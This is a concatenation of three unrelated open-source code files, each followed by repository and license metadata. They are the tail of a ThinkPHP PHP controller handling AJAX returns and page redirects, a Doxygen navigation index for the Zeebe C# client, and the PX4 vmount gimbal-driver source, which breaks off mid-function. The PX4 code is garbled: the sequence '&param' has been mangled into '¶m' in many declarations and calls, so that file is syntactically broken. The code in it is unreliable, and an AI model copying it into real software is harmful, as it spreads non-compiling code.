if(empty($type)) $type = C('DEFAULT_AJAX_RETURN');
switch (strtoupper($type)){
case 'JSON' :
// 返回JSON数据格式到客户端 包含状态信息
header('Content-Type:application/json; charset=utf-8');
exit(json_encode($data,$json_option));
case 'XML' :
// 返回xml格式数据
header('Content-Type:text/xml; charset=utf-8');
exit(xml_encode($data));
case 'JSONP':
// 返回JSON数据格式到客户端 包含状态信息
header('Content-Type:application/json; charset=utf-8');
$handler = isset($_GET[C('VAR_JSONP_HANDLER')]) ? $_GET[C('VAR_JSONP_HANDLER')] : C('DEFAULT_JSONP_HANDLER');
exit($handler.'('.json_encode($data,$json_option).');');
case 'EVAL' :
// 返回可执行的js脚本
header('Content-Type:text/html; charset=utf-8');
exit($data);
default :
// 用于扩展其他返回格式数据
Hook::listen('ajax_return',$data);
}
}
/**
* Action跳转(URL重定向) 支持指定模块和延时跳转
* @access protected
* @param string $url 跳转的URL表达式
* @param array $params 其它URL参数
* @param integer $delay 延时跳转的时间 单位为秒
* @param string $msg 跳转提示信息
* @return void
*/
protected function redirect($url,$params=array(),$delay=0,$msg='') {
$url = U($url,$params);
redirect($url,$delay,$msg);
}
/**
* 默认跳转操作 支持错误导向和正确跳转
* 调用模板显示 默认为public目录下面的success页面
* 提示页面为可配置 支持模板标签
* @param string $message 提示信息
* @param Boolean $status 状态
* @param string $jumpUrl 页面跳转地址
* @param mixed $ajax 是否为Ajax方式 当数字时指定跳转时间
* @access private
* @return void
*/
private function dispatchJump($message,$status=1,$jumpUrl='',$ajax=false) {
if(true === $ajax || IS_AJAX) {// AJAX提交
$data = is_array($ajax)?$ajax:array();
$data['info'] = $message;
$data['status'] = $status;
$data['url'] = $jumpUrl;
$this->ajaxReturn($data);
}
if(is_int($ajax)) $this->assign('waitSecond',$ajax);
if(!empty($jumpUrl)) $this->assign('jumpUrl',$jumpUrl);
// 提示标题
$this->assign('msgTitle',$status? L('_OPERATION_SUCCESS_') : L('_OPERATION_FAIL_'));
//如果设置了关闭窗口,则提示完毕后自动关闭窗口
if($this->get('closeWin')) $this->assign('jumpUrl','javascript:window.close();');
$this->assign('status',$status); // 状态
//保证输出不受静态缓存影响
C('HTML_CACHE_ON',false);
if($status) { //发送成功信息
$this->assign('message',$message);// 提示信息
// 成功操作后默认停留1秒
if(!isset($this->waitSecond)) $this->assign('waitSecond','3');
// 默认操作成功自动返回操作前页面
if(!isset($this->jumpUrl)) $this->assign("jumpUrl",$_SERVER["HTTP_REFERER"]);
$this->display(C('TMPL_ACTION_SUCCESS'));
}else{
$this->assign('error',$message);// 提示信息
//发生错误时候默认停留3秒
if(!isset($this->waitSecond)) $this->assign('waitSecond','3');
// 默认发生错误的话自动返回上页
if(!isset($this->jumpUrl)) $this->assign('jumpUrl',"javascript:history.back(-1);");
$this->display(C('TMPL_ACTION_ERROR'));
// 中止执行 避免出错后继续执行
exit ;
}
}
/**
* 析构方法
* @access public
*/
public function __destruct() {
// 执行后续操作
Hook::listen('action_end');
}
}
// 设置控制器别名 便于升级
class_alias('Think\Controller','Think\Action');
|
PHP
|
Apache-2.0
|
roinheart/insurance/ThinkPHP/Library/Think/Controller.class.php
|
7aecfd34-1698-4cb3-8f3e-ddb86d9ec227
|
[{"tag": "USERNAME", "value": "liu21st", "start": 494, "end": 501, "context": "------------------------------------\n// | Author: liu21st <liu21st@gmail.com>\n// +-------------------------"}, {"tag": "EMAIL", "value": "liu21st@gmail.com", "start": 503, "end": 520, "context": "---------------------------\n// | Author: liu21st <liu21st@gmail.com>\n// +--------------------------------------------"}]
|
[{"tag": "USERNAME", "value": "liu21st", "start": 494, "end": 501, "context": "------------------------------------\n// | Author: liu21st <liu21st@gmail.com>\n// +-------------------------"}, {"tag": "EMAIL", "value": "liu21st@gmail.com", "start": 503, "end": 520, "context": "---------------------------\n// | Author: liu21st <liu21st@gmail.com>\n// +--------------------------------------------"}]
|
var annotated_dup =
[
[ "Zeebe", "d6/d18/namespaceZeebe.html", [
[ "Client", "da/d88/namespaceZeebe_1_1Client.html", [
[ "Api", "d5/df7/namespaceZeebe_1_1Client_1_1Api.html", [
[ "Builder", "dc/d04/namespaceZeebe_1_1Client_1_1Api_1_1Builder.html", [
[ "IAccessTokenSupplier", "d2/d24/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IAccessTokenSupplier.html", null ],
[ "ICamundaCloudClientBuilder", "d7/d02/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilder.html", "d7/d02/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilder" ],
[ "ICamundaCloudClientBuilderStep1", "d7/d12/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderStep1.html", "d7/d12/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderStep1" ],
[ "ICamundaCloudClientBuilderStep2", "d9/d8a/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderStep2.html", "d9/d8a/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderStep2" ],
[ "ICamundaCloudClientBuilderFinalStep", "d1/d61/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderFinalStep.html", "d1/d61/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudClientBuilderFinalStep" ],
[ "ICamundaCloudTokenProviderBuilder", "d3/d08/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilder.html", "d3/d08/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilder" ],
[ "ICamundaCloudTokenProviderBuilderStep2", "de/db1/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep2.html", "de/db1/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep2" ],
[ "ICamundaCloudTokenProviderBuilderStep3", "d8/d4e/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep3.html", "d8/d4e/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep3" ],
[ "ICamundaCloudTokenProviderBuilderStep4", "da/d5d/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep4.html", "da/d5d/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderStep4" ],
[ "ICamundaCloudTokenProviderBuilderFinalStep", "d6/dd9/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderFinalStep.html", "d6/dd9/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1ICamundaCloudTokenProviderBuilderFinalStep" ],
[ "IZeebeClientBuilder", "d2/d7d/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientBuilder.html", "d2/d7d/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientBuilder" ],
[ "IZeebeClientTransportBuilder", "d2/df5/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientTransportBuilder.html", "d2/df5/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientTransportBuilder" ],
[ "IZeebeSecureClientBuilder", "d6/d64/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeSecureClientBuilder.html", "d6/d64/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeSecureClientBuilder" ],
[ "IZeebeClientFinalBuildStep", "d6/d2b/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientFinalBuildStep.html", "d6/d2b/interfaceZeebe_1_1Client_1_1Api_1_1Builder_1_1IZeebeClientFinalBuildStep" ]
] ],
[ "Commands", "d9/def/namespaceZeebe_1_1Client_1_1Api_1_1Commands.html", [
[ "IActivateJobsCommandStep1", "d4/d1d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep1.html", "d4/d1d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep1" ],
[ "IActivateJobsCommandStep2", "d0/d9e/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep2.html", "d0/d9e/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep2" ],
[ "IActivateJobsCommandStep3", "df/d94/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep3.html", "df/d94/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IActivateJobsCommandStep3" ],
[ "ICancelProcessInstanceCommandStep1", "d5/d79/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICancelProcessInstanceCommandStep1.html", null ],
[ "ICompleteJobCommandStep1", "d2/d53/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICompleteJobCommandStep1.html", "d2/d53/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICompleteJobCommandStep1" ],
[ "ICreateProcessInstanceCommandStep1", "dc/db3/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep1.html", "dc/db3/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep1" ],
[ "ICreateProcessInstanceCommandStep2", "df/d4a/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep2.html", "df/d4a/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep2" ],
[ "ICreateProcessInstanceCommandStep3", "d0/db3/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep3.html", "d0/db3/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceCommandStep3" ],
[ "ICreateProcessInstanceWithResultCommandStep1", "dd/dd6/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceWithResultCommandStep1.html", "dd/dd6/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ICreateProcessInstanceWithResultCommandStep1" ],
[ "IDeployProcessCommandStep1", "d6/db0/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IDeployProcessCommandStep1.html", "d6/db0/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IDeployProcessCommandStep1" ],
[ "IDeployProcessCommandBuilderStep2", "da/d46/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IDeployProcessCommandBuilderStep2.html", null ],
[ "IFailJobCommandStep1", "d9/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFailJobCommandStep1.html", "d9/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFailJobCommandStep1" ],
[ "IFailJobCommandStep2", "d5/d66/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFailJobCommandStep2.html", "d5/d66/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFailJobCommandStep2" ],
[ "IFinalCommandStep", "d2/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFinalCommandStep.html", "d2/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFinalCommandStep" ],
[ "IFinalCommandWithRetryStep", "d5/d5e/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFinalCommandWithRetryStep.html", "d5/d5e/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IFinalCommandWithRetryStep" ],
[ "IPublishMessageCommandStep1", "d8/d8d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep1.html", "d8/d8d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep1" ],
[ "IPublishMessageCommandStep2", "d9/d49/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep2.html", "d9/d49/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep2" ],
[ "IPublishMessageCommandStep3", "d5/d02/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep3.html", "d5/d02/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IPublishMessageCommandStep3" ],
[ "IResolveIncidentCommandStep1", "d0/d39/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IResolveIncidentCommandStep1.html", null ],
[ "ISetVariablesCommandStep1", "d2/d5d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ISetVariablesCommandStep1.html", "d2/d5d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ISetVariablesCommandStep1" ],
[ "ISetVariablesCommandStep2", "de/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ISetVariablesCommandStep2.html", "de/de4/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ISetVariablesCommandStep2" ],
[ "IThrowErrorCommandStep1", "d4/d22/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IThrowErrorCommandStep1.html", "d4/d22/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IThrowErrorCommandStep1" ],
[ "IThrowErrorCommandStep2", "d3/d85/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IThrowErrorCommandStep2.html", "d3/d85/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IThrowErrorCommandStep2" ],
[ "ITopologyRequestStep1", "d5/dae/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1ITopologyRequestStep1.html", null ],
[ "IUpdateRetriesCommandStep1", "da/d9d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IUpdateRetriesCommandStep1.html", "da/d9d/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IUpdateRetriesCommandStep1" ],
[ "IUpdateRetriesCommandStep2", "dd/dec/interfaceZeebe_1_1Client_1_1Api_1_1Commands_1_1IUpdateRetriesCommandStep2.html", null ]
] ],
[ "Misc", "de/df7/namespaceZeebe_1_1Client_1_1Api_1_1Misc.html", [
[ "IAsyncRetryStrategy", "de/d82/interfaceZeebe_1_1Client_1_1Api_1_1Misc_1_1IAsyncRetryStrategy.html", "de/d82/interfaceZeebe_1_1Client_1_1Api_1_1Misc_1_1IAsyncRetryStrategy" ]
] ],
[ "Responses", "dd/db3/namespaceZeebe_1_1Client_1_1Api_1_1Responses.html", [
[ "IActivateJobsResponse", "d5/d31/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IActivateJobsResponse.html", "d5/d31/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IActivateJobsResponse" ],
[ "IBrokerInfo", "d7/dce/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IBrokerInfo.html", "d7/dce/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IBrokerInfo" ],
[ "ICancelProcessInstanceResponse", "d9/d27/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ICancelProcessInstanceResponse.html", null ],
[ "ICompleteJobResponse", "d3/d3e/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ICompleteJobResponse.html", null ],
[ "IDeployResponse", "de/d05/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IDeployResponse.html", "de/d05/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IDeployResponse" ],
[ "IFailJobResponse", "de/d8a/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IFailJobResponse.html", null ],
[ "IJob", "dc/ddb/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IJob.html", "dc/ddb/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IJob" ],
[ "IPartitionInfo", "d7/d34/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IPartitionInfo.html", "d7/d34/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IPartitionInfo" ],
[ "IProcessInstanceResponse", "dd/d46/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessInstanceResponse.html", "dd/d46/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessInstanceResponse" ],
[ "IProcessInstanceResult", "d0/dd0/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessInstanceResult.html", "d0/dd0/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessInstanceResult" ],
[ "IProcessMetadata", "db/df6/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessMetadata.html", "db/df6/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IProcessMetadata" ],
[ "IPublishMessageResponse", "d0/dab/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IPublishMessageResponse.html", null ],
[ "IResolveIncidentResponse", "de/df8/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IResolveIncidentResponse.html", null ],
[ "ISetVariablesResponse", "d7/d1a/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ISetVariablesResponse.html", "d7/d1a/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ISetVariablesResponse" ],
[ "IThrowErrorResponse", "d7/d26/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IThrowErrorResponse.html", null ],
[ "ITopology", "df/d68/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ITopology.html", "df/d68/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1ITopology" ],
[ "IUpdateRetriesResponse", "d7/df3/interfaceZeebe_1_1Client_1_1Api_1_1Responses_1_1IUpdateRetriesResponse.html", null ]
] ],
[ "Worker", "db/d2d/namespaceZeebe_1_1Client_1_1Api_1_1Worker.html", [
[ "IJobClient", "df/d67/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobClient.html", "df/d67/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobClient" ],
[ "IJobWorker", "d1/dfe/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorker.html", "d1/dfe/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorker" ],
[ "IJobWorkerBuilderStep1", "d5/dc7/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep1.html", "d5/dc7/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep1" ],
[ "IJobWorkerBuilderStep2", "d5/d42/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep2.html", "d5/d42/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep2" ],
[ "IJobWorkerBuilderStep3", "d2/d59/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep3.html", "d2/d59/interfaceZeebe_1_1Client_1_1Api_1_1Worker_1_1IJobWorkerBuilderStep3" ]
] ]
] ],
[ "IZeebeClient", "d7/dd6/interfaceZeebe_1_1Client_1_1IZeebeClient.html", "d7/dd6/interfaceZeebe_1_1Client_1_1IZeebeClient" ]
] ]
] ]
];
|
JavaScript
|
Apache-2.0
|
Christian-Oleson/zeebe-client-csharp/docs/annotated_dup.js
|
ca6e0b8c-9f14-405b-bf82-fdb45115d830
|
[]
|
[]
|
/****************************************************************************
*
* Copyright (c) 2013-2016 PX4 Development Team. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
* 3. Neither the name PX4 nor the names of its contributors may be
* used to endorse or promote products derived from this software
* without specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
* FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
* COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
* INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
* BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS
* OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED
* AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
* ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*
****************************************************************************/
/**
* @file vmount.cpp
* @author Leon Müller (thedevleon)
* @author Beat Küng <beat-kueng@gmx.net>
* MAV_MOUNT driver for controlling mavlink gimbals, rc gimbals/servors and
* future kinds of mounts.
*
*/
#include <stdlib.h>
#include <stdio.h>
#include <stdbool.h>
#include <string.h>
#include <sys/types.h>
#include <fcntl.h>
#include <unistd.h>
#include <systemlib/err.h>
#include <px4_defines.h>
#include <px4_tasks.h>
#include "input_mavlink.h"
#include "input_rc.h"
#include "input_test.h"
#include "output_rc.h"
#include "output_mavlink.h"
#include <uORB/uORB.h>
#include <uORB/topics/parameter_update.h>
#include <px4_config.h>
using namespace vmount;
/* thread state */
static volatile bool thread_should_exit = false;
static volatile bool thread_running = false;
struct ThreadData {
InputBase *input_obj = nullptr;
OutputBase *output_obj = nullptr;
};
static volatile ThreadData *g_thread_data = nullptr;
struct Parameters {
int mnt_mode_in;
int mnt_mode_out;
int mnt_mav_sysid;
int mnt_mav_compid;
int mnt_ob_lock_mode;
int mnt_ob_norm_mode;
int mnt_man_control;
int mnt_man_pitch;
int mnt_man_roll;
int mnt_man_yaw;
bool operator!=(const Parameters &p)
{
return mnt_mode_in != p.mnt_mode_in ||
mnt_mode_out != p.mnt_mode_out ||
mnt_mav_sysid != p.mnt_mav_sysid ||
mnt_mav_compid != p.mnt_mav_compid ||
mnt_ob_lock_mode != p.mnt_ob_lock_mode ||
mnt_ob_norm_mode != p.mnt_ob_norm_mode ||
mnt_man_control != p.mnt_man_control ||
mnt_man_pitch != p.mnt_man_pitch ||
mnt_man_roll != p.mnt_man_roll ||
mnt_man_yaw != p.mnt_man_yaw;
}
};
struct ParameterHandles {
param_t mnt_mode_in;
param_t mnt_mode_out;
param_t mnt_mav_sysid;
param_t mnt_mav_compid;
param_t mnt_ob_lock_mode;
param_t mnt_ob_norm_mode;
param_t mnt_man_control;
param_t mnt_man_pitch;
param_t mnt_man_roll;
param_t mnt_man_yaw;
};
/* functions */
static void usage(void);
static void update_params(ParameterHandles ¶m_handles, Parameters ¶ms, bool &got_changes);
static bool get_params(ParameterHandles ¶m_handles, Parameters ¶ms);
static int vmount_thread_main(int argc, char *argv[]);
extern "C" __EXPORT int vmount_main(int argc, char *argv[]);
static void usage()
{
PX4_INFO("usage: vmount {start|stop|status|test}");
PX4_INFO(" vmount test {roll|pitch|yaw} <angle_deg>");
}
static int vmount_thread_main(int argc, char *argv[])
{
ParameterHandles param_handles;
Parameters params;
OutputConfig output_config;
ThreadData thread_data;
memset(¶ms, 0, sizeof(params));
InputTest *test_input = nullptr;
#ifdef __PX4_NUTTX
/* the NuttX optarg handler does not
* ignore argv[0] like the POSIX handler
* does, nor does it deal with non-flag
* verbs well. So we Remove the application
* name and the verb.
*/
argc -= 1;
argv += 1;
#endif
if (argc > 0 && !strcmp(argv[0], "test")) {
PX4_INFO("Starting in test mode");
const char *axis_names[3] = {"roll", "pitch", "yaw"};
float angles[3] = { 0.f, 0.f, 0.f };
if (argc == 3) {
bool found_axis = false;
for (int i = 0 ; i < 3; ++i) {
if (!strcmp(argv[1], axis_names[i])) {
long angle_deg = strtol(argv[2], NULL, 0);
angles[i] = (float)angle_deg;
found_axis = true;
}
}
if (!found_axis) {
usage();
return -1;
}
test_input = new InputTest(angles[0], angles[1], angles[2]);
if (!test_input) {
PX4_ERR("memory allocation failed");
return -1;
}
} else {
usage();
return -1;
}
}
if (!get_params(param_handles, params)) {
PX4_ERR("could not get mount parameters!");
return -1;
}
int parameter_update_sub = orb_subscribe(ORB_ID(parameter_update));
thread_running = true;
ControlData *control_data = nullptr;
InputRC *manual_input = nullptr;
g_thread_data = &thread_data;
while (!thread_should_exit) {
if (!thread_data.input_obj && (params.mnt_mode_in != 0 || test_input)) { //need to initialize
output_config.gimbal_normal_mode_value = params.mnt_ob_norm_mode;
output_config.gimbal_retracted_mode_value = params.mnt_ob_lock_mode;
output_config.mavlink_sys_id = params.mnt_mav_sysid;
output_config.mavlink_comp_id = params.mnt_mav_compid;
if (test_input) {
thread_data.input_obj = test_input;
} else {
if (params.mnt_man_control) {
manual_input = new InputRC(params.mnt_man_roll, params.mnt_man_pitch, params.mnt_man_yaw);
if (!manual_input) {
PX4_ERR("memory allocation failed");
break;
}
}
switch (params.mnt_mode_in) {
case 1: //RC
if (manual_input) {
thread_data.input_obj = manual_input;
manual_input = nullptr;
} else {
thread_data.input_obj = new InputRC(params.mnt_man_roll, params.mnt_man_pitch, params.mnt_man_yaw);
}
break;
case 2: //MAVLINK_ROI
thread_data.input_obj = new InputMavlinkROI(manual_input);
break;
case 3: //MAVLINK_DO_MOUNT
thread_data.input_obj = new InputMavlinkCmdMount(manual_input);
break;
default:
PX4_ERR("invalid input mode %i", params.mnt_mode_in);
break;
}
}
switch (params.mnt_mode_out) {
case 0: //AUX
thread_data.output_obj = new OutputRC(output_config);
break;
case 1: //MAVLINK
thread_data.output_obj = new OutputMavlink(output_config);
break;
default:
PX4_ERR("invalid output mode %i", params.mnt_mode_out);
break;
}
if (!thread_data.input_obj || !thread_data.output_obj) {
PX4_ERR("memory allocation failed");
thread_should_exit = true;
break;
}
int ret = thread_data.output_obj->initialize();
if (ret) {
PX4_ERR("failed to initialize output mode (%i)", ret);
thread_should_exit = true;
break;
}
}
if (thread_data.input_obj) {
//get input: we cannot make the timeout too large, because the output needs to update
//periodically for stabilization and angle updates.
int ret = thread_data.input_obj->update(50, &control_data);
if (ret) {
PX4_ERR("failed to read input (%i)", ret);
break;
}
//update output
ret = thread_data.output_obj->update(control_data);
if (ret) {
PX4_ERR("failed to write output (%i)", ret);
break;
}
thread_data.output_obj->publish();
} else {
//wait for parameter changes. We still need to wake up regularily to check for thread exit requests
usleep(1e6);
}
if (test_input && test_input->finished()) {
thread_should_exit = true;
break;
}
//check for parameter changes
bool updated;
if (orb_check(parameter_update_sub, &updated) == 0 && updated) {
parameter_update_s param_update;
orb_copy(ORB_ID(parameter_update), parameter_update_sub, ¶m_update);
update_params(param_handles, params, updated);
if (updated) {
//re-init objects
if (thread_data.input_obj) {
delete(thread_data.input_obj);
thread_data.input_obj = nullptr;
}
if (thread_data.output_obj) {
delete(thread_data.output_obj);
thread_data.output_obj = nullptr;
}
if (manual_input) {
delete(manual_input);
manual_input = nullptr;
}
}
}
}
g_thread_data = nullptr;
orb_unsubscribe(parameter_update_sub);
if (thread_data.input_obj) {
delete(thread_data.input_obj);
thread_data.input_obj = nullptr;
}
if (thread_data.output_obj) {
delete(thread_data.output_obj);
thread_data.output_obj = nullptr;
}
if (manual_input) {
delete(manual_input);
manual_input = nullptr;
}
thread_running = false;
return 0;
}
/**
* The main command function.
* Processes command line arguments and starts the daemon.
*/
int vmount_main(int argc, char *argv[])
{
if (argc < 2) {
PX4_ERR("missing command");
usage();
return -1;
}
if (!strcmp(argv[1], "start") || !strcmp(argv[1], "test")) {
/* this is not an error */
if (thread_running) {
PX4_WARN("mount driver already running");
return 0;
}
thread_should_exit = false;
int vmount_task = px4_task_spawn_cmd("vmount",
SCHED_DEFAULT,
SCHED_PRIORITY_DEFAULT + 40,
1500,
vmount_thread_main,
(char *const *)argv + 1);
int counter = 0;
while (!thread_running && vmount_task >= 0) {
usleep(5000);
if (++counter >= 100) {
break;
}
}
if (vmount_task < 0) {
PX4_ERR("failed to start");
return -1;
}
return counter < 100 || thread_should_exit ? 0 : -1;
}
if (!strcmp(argv[1], "stop")) {
/* this is not an error */
if (!thread_running) {
PX4_WARN("mount driver not running");
return 0;
}
thread_should_exit = true;
while (thread_running) {
usleep(100000);
}
return 0;
}
if (!strcmp(argv[1], "status")) {
if (thread_running && g_thread_data) {
if (g_thread_data->input_obj) {
g_thread_data->input_obj->print_status();
} else {
PX4_INFO("Input: None");
}
if (g_thread_data->output_obj) {
g_thread_data->output_obj->print_status();
} else {
PX4_INFO("Output: None");
}
} else {
PX4_INFO("not running");
}
return 0;
}
PX4_ERR("unrecognized command");
usage();
return -1;
}
void update_params(ParameterHandles ¶m_handles, Parameters ¶ms, bool &got_changes)
{
Parameters prev_params = params;
param_get(param_handles.mnt_mode_in, ¶ms.mnt_mode_in);
param_get(param_handles.mnt_mode_out, ¶ms.mnt_mode_out);
param_get(param_handles.mnt_mav_sysid, ¶ms.mnt_mav_sysid);
param_get(param_handles.mnt_mav_compid, ¶ms.mnt_mav_compid);
param_get(param_handles.mnt_ob_lock_mode, ¶ms.mnt_ob_lock_mode);
param_get(param_handles.mnt_ob_norm_mode, ¶ms.mnt_ob_norm_mode);
param_get(param_handles.mnt_man_control, ¶ms.mnt_man_control);
param_get(param_handles.mnt_man_pitch, ¶ms.mnt_man_pitch);
param_get(param_handles.mnt_man_roll, ¶ms.mnt_man_roll);
